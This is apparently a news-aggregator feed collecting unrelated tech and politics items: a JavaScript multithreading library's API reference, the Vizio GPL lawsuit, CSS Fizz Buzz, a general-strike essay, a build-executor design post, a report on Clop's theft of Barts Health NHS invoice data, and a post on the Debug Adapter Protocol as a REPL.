  // 2. Importing an external library (e.g., from a URL or node_modules resolution)
  const _ = await import("lodash");

  console.log("Magic number from relative file:", utils.magicNumber);
  console.log("Random number via lodash:", _.default.random(1, 100));
  
  return utils.magicNumber;
});

API Reference

Runtime

  • spawn(fn) : Runs a function in a worker.
  • spawn(move(arg1, arg2, ...), fn) : Runs a function in a worker with specific arguments transferred or copied.
  • initRuntime(config) : Initializes the thread pool (optional, lazy loaded by default; see the sketch after this list).
  • shutdown() : Terminates all workers in the pool.
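
As a rough sketch of the runtime lifecycle (the config shape is not documented here, so this example deliberately passes an empty object; everything else uses only the calls listed above):

import { initRuntime, spawn, shutdown } from "multithreading";

// Optional: initialize the pool eagerly instead of on first spawn().
initRuntime({});

await spawn(() => {
  console.log("Hello from a pooled worker");
}).join();

// Terminate all workers in the pool when done.
shutdown();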

Memory Management

  • move(...args) : Marks arguments to pass to the worker function; transferable objects are moved (ownership transfer) while other values are structured-cloned. Accepts a variable number of arguments which map to the arguments of the worker function.
  • drop(resource) : Explicitly disposes of a resource (calls [Symbol.dispose]). This is required for manual lock management in environments like Bun.
  • SharedJsonBuffer : A class for storing JSON objects in shared memory.

Channels (MPMC)

  • channel<T>(capacity) : Creates a new channel. Returns [Sender<T>, Receiver<T>] .
  • Sender<T> :
    • send(value) : Async. Returns Promise<Result<void, Error>> .
    • sendSync(value) : Blocking. Returns Result<void, Error> .
    • clone() : Creates a new handle to the same channel (increments ref count).
    • close() : Manually closes the channel for everyone.
  • Receiver<T> :
    • recv() : Async. Returns Promise<Result<T, Error>> .
    • recvSync() : Blocking. Returns Result<T, Error> .
    • clone() : Creates a new handle to the same channel.
    • close() : Manually drops this handle.

Synchronization

  • Mutex<T> :
    • acquire() : Async lock (Recommended). Returns Promise<MutexGuard> .
    • tryLock() : Non-blocking attempt. Returns boolean.
    • acquireSync() : Blocking lock (Halts Worker). Returns MutexGuard .
  • RwLock<T> :
    • read() : Async shared read access (Recommended).
    • write() : Async exclusive write access (Recommended).
    • readSync() / writeSync() : Synchronous/Blocking variants.
  • Semaphore :
    • acquire(amount?) : Async wait for n permits. Returns SemaphoreGuard .
    • tryAcquire(amount?) : Non-blocking. Returns SemaphoreGuard or null .
    • acquireSync(amount?) : Blocking wait. Returns SemaphoreGuard .
  • Condvar :
    • wait(guard) : Async wait (Recommended). Yields execution.
    • notifyOne() : Wake one waiting thread.
    • notifyAll() : Wake all waiting threads.
    • waitSync(guard) : Blocking wait (Halts Worker).

Technical Implementation Details

For advanced users interested in the internal mechanics:

  • Serialization Protocol : The library uses a custom "Envelope" protocol (PayloadType.RAW vs PayloadType.LIB). This allows complex objects like Mutex handles to be serialized, sent to a worker, and rehydrated into a functional object connected to the same SharedArrayBuffer on the other side.
  • Atomics : Synchronization is built on Int32Array backed by SharedArrayBuffer, using Atomics.wait and Atomics.notify (see the sketch after this list).
  • Import Patching : The spawn function analyzes the stack trace to determine the caller's file path. It then regex-patches import() statements within the worker code string so that relative paths resolve against the caller's location, rather than the worker's location.
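
As an illustration of that Atomics mechanism, here is a generic sketch of a lock built on Atomics.wait / Atomics.notify (not the library's actual internals):

const UNLOCKED = 0, LOCKED = 1;

function lockSync(i32, idx = 0) {
  // Atomically swap UNLOCKED -> LOCKED; otherwise sleep until notified.
  // (Atomics.wait blocks, so this belongs in a worker, like the sync variants above.)
  while (Atomics.compareExchange(i32, idx, UNLOCKED, LOCKED) !== UNLOCKED) {
    Atomics.wait(i32, idx, LOCKED);
  }
}

function unlock(i32, idx = 0) {
  Atomics.store(i32, idx, UNLOCKED);
  Atomics.notify(i32, idx, 1); // wake at most one waiter
}

const i32 = new Int32Array(new SharedArrayBuffer(4));
lockSync(i32);
// ...critical section...
unlock(i32);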

Judge Signals Win for Software Freedom Conservancy in Vizio GPL Case

Hacker News
fossforce.com
2025-12-05 20:42:04
Comments...
Original Article

A California judge has tentatively sided with Software Freedom Conservancy in its GPL case over Vizio’s SmartCast TVs, but the final outcome of this week’s hearing is still pending.

Source: Pixabay

We’re waiting to hear the final outcome of a legal case involving the GPL that harkens back to the bad “good ol’ days” of Linux and open source.

This case involves an action brought against Vizio — a maker of relatively low‑cost flat panel TVs — by Software Freedom Conservancy, which claims that the company has been in violation of the GNU General Public License, version 2 and the GNU Lesser General Public License, version 2.1 for many years. The case centers around the company’s SmartCast TVs, which employ Linux, BusyBox, and other software licensed under GPLv2 and LGPLv2.1, without making source code available.

SFC’s standing in the case is as a purchaser of a Vizio smart TV and not as a copyright holder.

SFC has reported that early Thursday morning Judge Sandy N. Leal of the Superior Court of California issued a tentative ruling supporting SFC’s claim that Vizio has a duty to provide SFC with the complete source code covered under open source licenses to a TV it purchased. Being tentative, the ruling isn’t final; such rulings are issued so that the parties know how the judge is leaning and can tailor their oral arguments. It was issued before a hearing scheduled for 10 a.m. PST the same day.

So far there’s been no news coming out of that hearing, although we’ve reached out to SFC for a comment.

A Predictable Outcome

These days the GPL and other open source licenses have been court tested enough to make the outcome in a case like this somewhat predictable: the courts will support the terms of the license. This hasn’t always been the case. For many years after the first adoption of the GPL as a free software license, and even later when the term open source came into use, it wasn’t clear whether courts would support the terms of open source licensing.

That began to change in the first decade of the 21st century as cases were brought against violators of open source licenses, with license terms being upheld by the courts.

Then in September 2007 the Software Freedom Law Center filed the first-ever US GPL enforcement lawsuit. The defendant was Monsoon Multimedia, for its Hava place‑shifting devices that SFLC claimed shipped with BusyBox installed without provisions for the source code.​ That case was dismissed about a month later, after Monsoon agreed to publish source code, appoint a compliance officer, notify customers of their GPL rights, and pay an undisclosed sum.​

Later that year, SFLC brought additional BusyBox-related GPL suits against other vendors, including Xterasys and Verizon, over failure to provide source code. Those were also settled with compliance commitments and payments.

Vizio: A Goliath in Disguise

In the case against Vizio, SFC is going against a company that can afford a deep-pocket defense if it decides to play hardball. The Irvine, California-based company, founded in 2002 as a designer of televisions, soundbars, and related software and accessories, was acquired by Walmart for $2.3 billion in a deal announced in February 2024 and closed that December.

While the acquisition was in progress, Bloomberg announced that Walmart planned to end sales of Vizio products at Amazon and Best Buy in order to turn the company into a private label brand available only at Walmart and Sam’s Club locations.

Assemblies: A Path to Co-Governance and Democratic Renewal

OrganizingUp
convergencemag.com
2025-12-05 20:24:21
Democracy should give us a real say in the decisions that shape our lives, but few people today feel the government is working for them. Inequality is extreme, our economic lives are precarious, and trust in government and all kinds of institutions is at historic lows. All this has opened up space f...

Advertising as a major source of human dissatisfaction (2019) [pdf]

Hacker News
www.andrewoswald.com
2025-12-05 20:18:34
Comments...
Original Article
No preview for link for known binary extension (.pdf), Link: https://www.andrewoswald.com/docs/AdvertisingMicheletal2019EasterlinVolume.pdf.

Fizz Buzz in CSS

Hacker News
susam.net
2025-12-05 20:18:22
Comments...
Original Article

By Susam Pal on 06 Dec 2025

What is the smallest CSS code we can write to print the Fizz Buzz sequence? I think it can be done in four lines of CSS as shown below:

li { counter-increment: n }
li:not(:nth-child(5n))::before { content: counter(n) }
li:nth-child(3n)::before { content: "Fizz" }
li:nth-child(5n)::after { content: "Buzz" }

Here is a complete working example: css-fizz-buzz.html .

I am neither a web developer nor a code-golfer. Seasoned code-golfers looking for a challenge can probably shrink this solution further. However, such wizards are also likely to scoff at any mention of counting lines of code, since CSS can be collapsed into a single line. The number of characters is probably more meaningful. The code can also be minified slightly by removing all whitespace:

$ curl -sS https://susam.net/css-fizz-buzz.html | sed -n '/counter/,/after/p' | tr -d '[:space:]'
li{counter-increment:n}li:not(:nth-child(5n))::before{content:counter(n)}li:nth-child(3n)::before{content:"Fizz"}li:nth-child(5n)::after{content:"Buzz"}

This minified version is composed of 152 characters:

$ curl -sS https://susam.net/css-fizz-buzz.html | sed -n '/counter/,/after/p' | tr -d '[:space:]' | wc -c
152

If you manage to create a shorter solution, please do leave a comment.

Framework Sponsors CachyOS

Hacker News
discuss.cachyos.org
2025-12-05 20:03:21
Comments...

Maybe a General Strike Isn’t So Impossible Now

Portside
portside.org
2025-12-05 19:54:03
Maybe a General Strike Isn’t So Impossible Now Maureen Fri, 12/05/2025 - 14:54 ...
Original Article

[This article is part of a Labor Notes roundtable series: How Can Unions Defend Worker Power Against Trump 2.0? We will be publishing more contributions here and in our magazine in the months ahead. Click here to read the rest of the series. —Editors]

Trump’s attacks on working people—threats to send troops into major U.S. cities, ripping collective bargaining rights from a million federal workers, an immigration enforcement terror campaign that borders on unconstitutional—have been so extreme that many people are talking about a general strike. These calls are coming not just from the usual suspects, but even from my own mayor, former Chicago Teachers Union leader and organizer Brandon Johnson.

We’ve all heard calls for a general strike before—usually not as a serious proposal or strategy, but as a reaction to the attacks that working people face on a regular basis from existing political and economic power. Such calls are easy to dismiss, because they tend to come from well-meaning people without the knowledge of how difficult a strike is to launch and win in a single shop, let alone across a country of 330 million people that hasn’t seen anything approaching a national general strike in almost 150 years.

Those of us who have done the hard work of organizing our co-workers, winning union recognition, and negotiating with recalcitrant employers have frequently dismissed the idea out of hand. But two years ago, in the wake of the “Stand-Up Strike” at the Big 3 U.S. automakers, United Auto Workers President Shawn Fain put the idea on the table when he called on the labor movement to prepare to strike together on May 1, 2028.

At first glance it sounds impossible—but a strategic look back at the coordinated strikes and militancy of the past two decades shows we might be much closer than we think. We’ve laid the groundwork. Now we have to harness the lessons from those fights and “speed-run” to much larger, disruptive actions.

PROVOCATIVE CONDITIONS

The preconditions for large-scale coordinated actions are being laid out in plain view. Draconian, racist attacks on entire communities with the veneer of immigration enforcement. Gigantic tax cuts for the wealthy and corporations—which, along with economic contraction and federal budget cuts, will lead to huge budget challenges in statehouses and city halls across the country.

The attacks on democracy, immigrants, and the rule of law have already led to some of the largest mass mobilizations in U.S. history, including on October 18, when millions of people across the country joined thousands of “No Kings” protests. For the labor movement, the question is: when do we shift from mass mobilizations to mass economic action?

The first half of 2026 is the critical moment. State legislators across the country will begin their deliberations over budgets hobbled by the hollowing-out of the federal government, at the same time that the $170 billion increase to ICE’s budget begins moving in earnest. Public colleges and universities will begin feeling the even deeper impact of the Trump administration’s cuts and attacks, as tech oligarchs and finance capital continue to bleed workers and the public sector.

We need to plan now to connect and coordinate these fights in our cities and states. Not a top-down national plan or centralized day of action, but a plan made in every state.


FOUR LESSONS

Here are four important lessons we can learn from the recent past:

Immigrant community defense must be understood as economic action, and lifted up. In 2006, the national movement for “A Day Without an Immigrant” began with a march of 100,000 on March 10, and peaked on May 1 , when 500,000 immigrants and allies marched through downtown Chicago.

So many immigrant workers and their allies participated in that day’s action, also known as the “Great American Boycott,” that large parts of the Chicago area were effectively shut down for economic activity. Stores and restaurants closed either in solidarity with their workers or of necessity, with not enough staff to function.

Bring labor and community together to coordinate campaigns. Ten years after the reemergence of May Day, in the midst of what would become a two-year-long Illinois state budget stalemate under a billionaire Republican governor, the Chicago Teachers Union went on a one-day strike to protest the budget impasse and call for full funding of schools.

For most of 2015, CTU and SEIU Healthcare Illinois had jointly convened a coalition of local unions, united in a commitment to progressive working-class politics and militant action, to coordinate campaigns and share strategies.

Because of that coalition’s work, a dozen unions participated in the 2016 one-day strike , including fast food workers with the Fight for 15, higher education unions from Chicago State and Northeastern Illinois universities, and childcare and homecare workers from SEIU HCII, along with a large community coalition led by both longtime neighborhood groups and key organizers of the Black Lives Matter movement.

Push our unions to take bigger risks, especially in key sectors. In February 2018, incensed by insulting wage proposals from another billionaire Republican governor, West Virginia teachers set off what would become a nationwide wave of city and statewide teacher strikes , the Red for Ed movement. Some were one-day strikes billed as “days of action”; some were sustained for weeks. Importantly, almost all of the multi-district and statewide walkouts happened in states where teachers were prohibited by law from going on strike—but they went on strike anyway.

Public school teachers, by their nature, are embedded in communities. To varying degrees, so are many other groups of workers: in state and county governments, nursing homes and health clinics, community colleges, grocery stores, and restaurants. These are all potentially key sectors that have public reach and visibility across diverse communities.

Line up contract expiration dates and demands across industries, and work with community allies to publicize demands for the common good. In March 2024, unions representing more than 15,000 workers in the Twin Cities coordinated strike authorization votes across several industries .

This effort, launched publicly in October 2023, included teachers, transit workers, janitors, nursing home workers, and retail workers from six different unions. It was the product of intense joint campaigning and leadership development.

The simple threat of coordinated strike action led to big contract wins for transit workers, Minneapolis city workers, and security officers, while an even broader coalition of labor and community allies supported janitors, nursing home workers, and retail workers through their strikes.

PROGRESS IN UPHEAVAL

One thing we know about the coming months is that the attacks from Trump and his corporate allies will only sharpen. And the structures that exist now—our unions and other organized groups that are fighting for immigrant justice, tenant rights, and a fair economy, as scattered and weak as they may be—are the vehicles we have to organize a fightback.

In the history of this country, worker movements have been the critical central driver toward justice and equality. But workers have always faced daunting odds against powerful opponents with the ability to disorganize and disorient us.

The progress we make is not linear, but happens in moments of upheaval and upsurge. Our task isn’t to create the perfect strategy for the masses to follow. It is to use the lessons of the past to set the table for the fights of the future.

I want a better build executor

Lobsters
jyn.dev
2025-12-05 19:50:48
Comments...
Original Article

This post is part 4/4 of a series about build systems .


The market fit is interesting. Git has clearly won, it has all of the mindshare, but since you can use jj to work on Git repositories, it can be adopted incrementally. This is, in my opinion, the only viable way to introduce a new VCS: it has to be able to be partially adopted.

Steve Klabnik

If you've worked with other determinism-based systems, one thing they have in common is they feel really fragile, and you have to be careful that you don't do something that breaks the determinism. But in our case, since we've created every level of the stack to support this, we can offload the determinism to the development environment and you can basically write whatever code you want without having to worry about whether it's going to break something.

Allan Blomquist

In my last post , I describe an improved build graph serialization. In this post, I describe the build executor that reads those files.

what is a build executor?

Generally, there are three stages to a build:

  1. Resolving and downloading dependencies. The tool that does this is called a package manager . Common examples are npm , pip , Conan 1 , and the cargo resolver .
  2. Configuring the build based on the host environment and build targets. I am not aware of any common name for this, other than maybe configure script (but there exist many tools for this that are not just shell scripts). Common examples are CMake, Meson, autotools, and the Cargo CLI interface (e.g. --feature and --target ).
  3. Executing a bunch of processes and reporting on their progress. The tool that does this is called a build executor . Common examples are make , ninja , docker build , and the Compiling phase of cargo build .

There are a lot more things an executor can do than just spawning processes and showing a progress report! This post explores what those are and sketches a design for a tool that could improve on current executors.

change detection

Ninja depends on mtimes, which have many issues . Ideally, it would take notes from redo and look at file attributes, not just the mtime, which eliminates many more false positives.
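
For illustration, a redo-style signature could combine several stat fields rather than the mtime alone. This is a sketch of the idea in Node, not ninja's or redo's actual code:

import { statSync } from "node:fs";

// A file counts as changed if any of these attributes differ from the
// values recorded at the end of the previous build.
function signature(path) {
  const s = statSync(path);
  return [s.mtimeMs, s.size, s.ino, s.mode].join(":");
}

const changed = (path, recorded) => signature(path) !== recorded;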

querying

I wrote earlier about querying the build graph . There are two kinds of things you can query: the configuration graph (what Bazel calls the target graph), which shows dependencies between "human meaningful" packages; and the action graph, which shows dependencies between files.

Queries on the action graph live in the executor; queries on the configuration graph live in the configure script. For example, cargo metadata / cargo tree, bazel query, and cmake --graphviz query the configuration graph; ninja -t inputs and bazel aquery query the action graph. Cargo has no stable way to query the action graph.

Note that “querying the graph” is not a binary yes/no. Ninja's query language is much more restricted than Bazel's. Compare Ninja's syntax for querying “the command line for all C++ files used to build the target //:hello_world” 2 :

$ ninja -t inputs hello_world | grep '\.c++$' | xargs ninja -t targets | cut -d : -f 1 | xargs ninja -t commands
g++ -c -o my_lib.o my_lib.cpp
g++ -o hello_world hello_world.cpp my_lib.o

to Bazel's:

$ bazel aquery 'inputs(".*cpp", deps(//:hello_world))'
action 'Compiling hello_world.cpp'
  Mnemonic: CppCompile
  Target: //:hello_world
  Configuration: k8-fastbuild
  Execution platform: @@platforms//host:host
  ActionKey: 155b2cdb875736efc8d218ea790d2ef9ce698f0b1b1700d58de3c135145b1d12
  Inputs: [external/rules_cc++cc_configure_extension+local_config_cc/builtin_include_directory_paths, external/rules_cc++cc_configure_extension+local_config_cc/cc_wrapper.sh, external/rules_cc++cc_configure_extension+local_config_cc/deps_scanner_wrapper.sh, external/rules_cc++cc_configure_extension+local_config_cc/validate_static_library.sh, hello_world.cpp, my_lib.h]
  Outputs: [bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.d, bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.o]
  Command Line: (exec /nix/store/vr15iyyykg9zai6fpgvhcgyw7gckl78w-gcc-wrapper-14.3.0/bin/gcc \
    -U_FORTIFY_SOURCE \
    -fstack-protector \
    -Wall \
    -Wunused-but-set-parameter \
    -Wno-free-nonheap-object \
    -fno-omit-frame-pointer \
    '-std=c++17' \
    -MD \
    -MF \
    bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.d \
    '-frandom-seed=bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.o' \
    -fPIC \
    -iquote \
    . \
    -iquote \
    bazel-out/k8-fastbuild/bin \
    -iquote \
    external/rules_cc+ \
    -iquote \
    bazel-out/k8-fastbuild/bin/external/rules_cc+ \
    -iquote \
    external/bazel_tools \
    -iquote \
    bazel-out/k8-fastbuild/bin/external/bazel_tools \
    -c \
    hello_world.cpp \
    -o \
    bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.o \
    -fno-canonical-system-headers \
    -Wno-builtin-macro-redefined \
    '-D__DATE__="redacted"' \
    '-D__TIMESTAMP__="redacted"' \
    '-D__TIME__="redacted"')

Bazel’s language has graph operators, such as union, intersection, and filtering, that let you build up quite complex predicates. Ninja can only express one predicate at a time, with much more limited filtering—but unlike Bazel, allows you to filter to individual parts of the action, like the command line invocation, without needing a full protobuf parser or trying to do text post-processing.

I would like to see a query language that combines both these strengths: the same nested predicate structure as Bazel queries, plus a new emit() predicate that takes another predicate as an argument for complex output filtering:

emit(commands, inputs(".*cpp", deps(./src/hello_world)))

We could even go so far as to give this a jq-like syntax:

./src/hello_world | deps | inputs "*.c++" | emit commands

For more complex predicates that have multiple sets as inputs, such as set union and intersection, we could introduce a subquery operator:

glob "src/**" | except subquery(glob("src/package/**") | executable)

tracing

In my previous post , I talked about two main uses for a tracing build system: first, to automatically add dependency edges for you; and second, to verify at runtime that no dependency edges are missing. This especially shines when the action graph has a way to express negative dependencies, because the tracing system sees every attempted file access and can add them to the graph automatically.

For prior art, see the Shake build system . Shake is higher-level than an executor and doesn't work on an action graph, but it has built-in support for file tracing in all three of these modes: warning about incorrect edges; adding new edges to the graph when they're detected at runtime; and finally, fully inferring all edges from the nodes alone .

I would want my executor to only support linting and hard errors for missing edges. Inferring a full action graph is scary and IMO belongs in a higher-level tool, and adding dependency edges automatically can be done by a tool that wraps the executor and parses the lints.

What's really cool about this linting system is that it allows you to gradually transition to a hermetic build over time, without frontloading all the work to when you switch to the tool.

environment variables

Tracing environment variable access is … hard. Traditionally access goes through the libc getenv function, but it’s also possible to take an envp in a main function, in which case accesses are just memory reads. That means we need to trace memory reads somehow.

On x86 machines, there’s something called PIN that can do this directly in the CPU without needing compile time instrumentation. On ARM there’s SPE , which is how perf mem works, but I’m not sure whether it can be configured to track 100% of memory accesses. I need to do more research here.

On Linux, this is all abstracted by perf_event_open . I’m not sure if there’s equivalent wrappers on Windows and macOS.

One last way to do this is with a SIGSEGV signal handler , but that requires that environment variables are in their own page of memory and therefore a linker script. This doesn’t work for environment variables specifically, because they aren’t linker symbols in the normal sense, they get injected by the C runtime . In general, injecting linker scripts means we’re modifying the binaries being run and might cause unexpected build or runtime failures.

ronin : a ninja successor

Here I describe more concretely the tool I want to build, which I’ve named ronin . It would read the constrained Clojure action graph serialization format (Magma) that I describe in the previous post, perhaps with a way to automatically convert Ninja files to Magma.

interface

Like Ekam , Ronin would have a --watch continuous rebuild mode (but unlike Bazel and Buck2, no background server). Like Shake, it would have runtime tracing, with --tracing=never|warn|error options, to allow gradually transitioning to a hermetic build. And it would have Bazel-like querying for the action graph, both through CLI arguments with a jq-like syntax and through a programmatic API.

Finally, it would have pluggable backends for file watching, tracing, stat-ing, progress reporting, and checksums, so that it can take advantage of systems that have more features while still being reasonably fast on systems that don’t. For example, on Windows stats are slow, so it would cache stat info; but on Linux stats are fast so it would just directly make a syscall.

architecture

Like Ninja, Ronin would keep a command log with a history of past versions of the action graph. It would reuse the bipartite graph structure , with one half being files and the other being commands. It would parse depfiles and dyndeps files just after they’re built, while the cache is still hot.

Like n2 , ronin would use a single-pass approach to support early cutoff. It would hash an "input manifest" to decide whether to rebuild. Unlike n2 , it would store a mapping from that hash back to the original manifest so you can query why a rebuild happened.
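
A sketch of what that could look like; the manifest shape here is an assumption for illustration, not n2's actual format:

import { createHash } from "node:crypto";

// Hash the command line together with the identities of its inputs.
function inputManifest(command, inputSignatures) {
  const manifest = JSON.stringify({ command, inputs: inputSignatures });
  const hash = createHash("sha256").update(manifest).digest("hex");
  return { hash, manifest };
}

// Storing hash -> manifest (e.g. in SQLite) keeps "why did this action
// rebuild?" answerable: diff the stored manifest against the new one.
const db = new Map();
const { hash, manifest } = inputManifest("g++ -c main.cpp", ["main.cpp:mtime=123"]);
db.set(hash, manifest);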

Tracing would be built on top of a FUSE file system that tracked file access. 3

Unlike other build systems I know, state (such as manifest hashes, content hashes, and removed outputs) would be stored in an SQLite database, not in flat files.

did you just reinvent buck2?

Kinda. Ronin takes a lot of ideas from buck2. It differs in two major ways:

  • It does not expect to be a top-level build system. It is perfectly happy to read (and encourages) generated files from a higher level configure tool. This allows systems like CMake and Meson to mechanically translate Ninja files into this new format, so builds for existing projects can get nice things.
  • It allows you to gradually transition from non-hermetic to hermetic builds, without forcing you to fix all your rules at once, and with tracing to help you find where you need to make your fixes. Buck2 doesn’t support tracing at all. It technically supports non-hermetic builds, but you don't get many benefits compared to using a different build system, and it's still high cost to switch build systems 4 .

The main advantage of Ronin is that it can slot in underneath existing build systems people are already using—CMake and Meson—without needing changes to your build files at all.

summary

In this post I describe what a build executor does, some features I would like to see from an executor (with a special focus on tracing), and a design for a new executor called ronin that allows existing projects generating ninja files to gradually transition to hermetic builds over time, without a “flag day” that requires rewriting the whole build system.

I don’t know yet if I will actually build this tool, that seems like a lot of work 5 😄 but it’s something I would like to exist in the world.

  1. In many ways Conan profiles are analogous to ninja files: profiles are the interface between Conan and CMake in the same way that ninja files are the interface between CMake and Ninja. Conan is the only tool I'm aware of where the split between the package manager and the configure step is explicit.

  2. This is not an apples-to-apples comparison; ideally we would name the target by the output file, not by its alias. Unfortunately output names are unpredictable and quite long in Bazel.

  3. macOS does not have native support for FUSE. MacFuse exists but does not support getting the PID of the calling process. A possible workaround would be to start a new FUSE server for each spawned process group. FUSE on Windows is possible through winfsp .

  4. An earlier version of this post read "Buck2 only supports non-hermetic builds for system toolchains , not anything else", which is not correct.

  5. what if i simply took buck2 and hacked it to bits,,,

Picking Optimal Token IDs

Lobsters
notes.hella.cheap
2025-12-05 19:41:33
Comments...
Original Article

I have a search index that stores, for each of a bunch of documents, the set of tokens that occur in that document. I encode that as a sparse bit vector, where each token has an ID and the bit at that index in the bit vector indicates whether that token is present in the document. Since most tokens do not occur in most documents, these vectors are sparse (most of the bits are zeros).

Since the vectors are sparse I can save a lot of space by not storing all the zero bits. The simplest way to do this is with different flavors of run-length encoding, but in order to make intersection and subset tests fast I actually use a representation that's more like the nodes in an array-mapped tree ; there's a bitmask with one bit per 64-bit word of the bit vector indicating whether that word contains any nonzero bits, and we only store the 64-bit words that aren't zero.
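
As a sketch of that encoding (assuming vectors of at most 32 × 64 bits so the mask fits in a single integer; not the index's actual code):

// Store one mask bit per 64-bit word, plus only the words that are nonzero.
function encode(words /* array of BigInt, one per 64-bit word */) {
  let mask = 0;
  const nonzero = [];
  words.forEach((w, i) => {
    if (w !== 0n) {
      mask |= 1 << i;
      nonzero.push(w);
    }
  });
  return { mask, nonzero }; // runs of zero words cost nothing beyond mask bits
}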

Either way, whether we're using RLE or our mask encoding, the longer our contiguous runs of zeros are, the less data we have to store. While we don't get to pick what tokens occur in which documents, we do get to pick which tokens are next to each other in the vector; ie we're free to choose whatever token IDs we want. We want to choose token ids such that the one bits are all clumped together.

Another way to say we want one bits clumped together is to say we want to maximize the probability that a particular bit is a one given that its neighbors are ones, and maximize the probability that a bit is a zero if its neighbors are zeros.

We can calculate those probabilities by generating a co-occurrence matrix. That's a symmetric matrix whose rows and columns are tokens, and where the value at a,b is the number of times a and b occur in the same document.
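
Building that matrix is straightforward; a sketch, assuming each document is an array of token indices:

// C[a][b] counts the documents in which tokens a and b co-occur.
function cooccurrence(docs, numTokens) {
  const C = Array.from({ length: numTokens }, () => Array(numTokens).fill(0));
  for (const doc of docs) {
    const toks = [...new Set(doc)]; // count each pair once per document
    for (const a of toks) {
      for (const b of toks) C[a][b]++;
    }
  }
  return C;
}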

Now we want to choose an ordering of the rows such that rows that co-occur heavily end up close together. We do that by finding the eigenvector of the matrix with the largest eigenvalue, multiplying by that vector (which gives us a single column vector), and then sorting by the values of that column vector. This is basically doing PCA down to 1D .
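
A sketch of that ordering step, using power iteration to approximate the dominant eigenvector (an assumed implementation; any eigensolver would do):

// v converges to the eigenvector of C with the largest eigenvalue.
function dominantEigenvector(C, iters = 100) {
  const n = C.length;
  let v = Array(n).fill(1 / Math.sqrt(n));
  for (let t = 0; t < iters; t++) {
    const w = C.map(row => row.reduce((sum, x, j) => sum + x * v[j], 0));
    const norm = Math.sqrt(w.reduce((s, x) => s + x * x, 0));
    v = w.map(x => x / norm);
  }
  return v;
}

// Token IDs are each token's rank in the sorted eigenvector.
function tokenIds(C) {
  const v = dominantEigenvector(C);
  const order = v.map((_, i) => i).sort((a, b) => v[a] - v[b]);
  const ids = Array(C.length);
  order.forEach((token, rank) => { ids[token] = rank; });
  return ids;
}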

This works in practice, and gives me an overall 12% improvement in index size over choosing token ids at random.

Barts Health NHS discloses data breach after Oracle zero-day hack

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 18:55:26
Barts Health NHS Trust has announced that Clop ransomware actors have stolen files from a database by exploiting a vulnerability in its Oracle E-business Suite software. [...]...
Original Article

Barts Health NHS discloses data breach after Oracle zero-day hack

Barts Health NHS Trust, a major healthcare provider in England, announced that Clop ransomware actors have stolen files from one of its databases after exploiting a vulnerability in its Oracle E-business Suite software.

The stolen data are invoices spanning several years that expose the full names and addresses of individuals who paid for treatment or other services at Barts Health hospital.

Information of former employees who owed money to the trust, and suppliers whose data is already public, has also been exposed, the organization says.

In addition to Barts' files, the compromised database includes files concerning accounting services the trust provided since April 2024 to Barking, Havering, and Redbridge University Hospitals NHS Trust.

Cl0p ransomware has leaked the stolen information on its leak portal on the dark web.

"The theft occurred in August, but there was no indication that trust data was at risk until November when the files were posted on the dark web," explained Barts .

"To date no information has been published on the general internet, and the risk is limited to those able to access compressed files on the encrypted dark web."

The hospitals operator stated that it is in the process of getting a High Court order to ban the publication, use, or sharing of the exposed data by anyone, though such orders have limited effect in practice.

Barts Health NHS Trust runs five hospitals throughout the city of London, namely Mile End Hospital, Newham University Hospital, Royal London Hospital, St Bartholomew's Hospital, and Whipps Cross University Hospital.

The Clop ransomware gang has been exploiting a critical Oracle EBS flaw tracked as CVE-2025-61882 as a zero-day in data theft attacks since early August , stealing private information from a large number of organizations worldwide.

Victims that have confirmed impact from Cl0p ransomware's campaign include Envoy Air , Harvard University , GlobalLogic , Washington Post , Logitech , Dartmouth College , the University of Pennsylvania , and the University of Phoenix .

Barts has already informed the National Cyber Security Centre, the Metropolitan Police, and the Information Commissioner's Office (ICO) about the data theft incident.

The healthcare organization assured that Clop's attack did not impact its electronic patient record and clinical systems, and it is confident that its core IT infrastructure remains secure.

Patients who have paid Barts are recommended to check their invoices to determine what data was exposed and to stay vigilant for unsolicited communications, especially messages that request payment or the sharing of sensitive information.

The Debug Adapter Protocol is a REPL protocol in disguise

Hacker News
zignar.net
2025-12-05 18:51:38
Comments...
Original Article

Table of content


A couple months back I created nluarepl . It’s a REPL for the Neovim Lua interpreter with a little twist: it’s using the Debug Adapter Protocol. And before that, I worked on hprofdap , also a kind of REPL using DAP, one that lets you inspect Java heap dumps (.hprof files) using OQL.

As the name might imply, a REPL isn’t the main use case for the Debug Adapter Protocol (DAP). From the DAP page :

The idea behind the Debug Adapter Protocol (DAP) is to abstract the way how the debugging support of development tools communicates with debuggers or runtimes into a protocol.

But it works surprisingly well for a REPL interface to a language interpreter too.

Essentials

The typical REPL shows you a prompt after which you can enter an expression. You then hit Enter to submit the expression, it gets evaluated and you’re presented with the result or an error.

The Debug Adapter Protocol defines an evaluate command which, as the name implies, evaluates expressions.

The definition for the payload the client needs to send looks like this:

interface EvaluateArguments {
  /**
   * The expression to evaluate.
   */
  expression: string;

  // [...]
}

With a few more optional properties.

The important bit of the response format definition looks like this:

interface EvaluateResponse extends Response {
  body: {
    /**
     * The result of the evaluate request.
     */
    result: string;

    /**
     * The type of the evaluate result.
     * This attribute should only be returned by a debug adapter if the
     * corresponding capability `supportsVariableType` is true.
     */
    type?: string;

    /**
     * If `variablesReference` is > 0, the evaluate result is structured and its
     * children can be retrieved by passing `variablesReference` to the
     * `variables` request as long as execution remains suspended. See 'Lifetime
     * of Object References' in the Overview section for details.
     */
    variablesReference: number;

    // [...]
}

result is a string and there is optionally a type. The neat bit is the variablesReference . It’s used to model structured data, allowing clients to build a tree-like UI to drill down into the details of a data structure.
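
For example, a hypothetical exchange for a Lua value (the expression, rendering, and reference number are invented for illustration):

// Client -> adapter: evaluate request arguments
const args = { expression: "vim.fs" };

// Adapter -> client: response body
const body = {
  result: "table: 0x7f9c2e4a10", // one-line rendering of the value
  type: "table",
  variablesReference: 42,        // > 0: structured, expandable via `variables`
};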

Here is a demo to see it in action:

To get the data, or expand an option as shown in the demo above, the client must call the variables command with the variablesReference as payload. The response has an array of variables, where a variable looks like this:

interface Variable {
  /**
   * The variable's name.
   */
  name: string;

  /**
   * The variable's value.
   * This can be a multi-line text, e.g. for a function the body of a function.
   * For structured variables (which do not have a simple value), it is
   * recommended to provide a one-line representation of the structured object.
   * This helps to identify the structured object in the collapsed state when
   * its children are not yet visible.
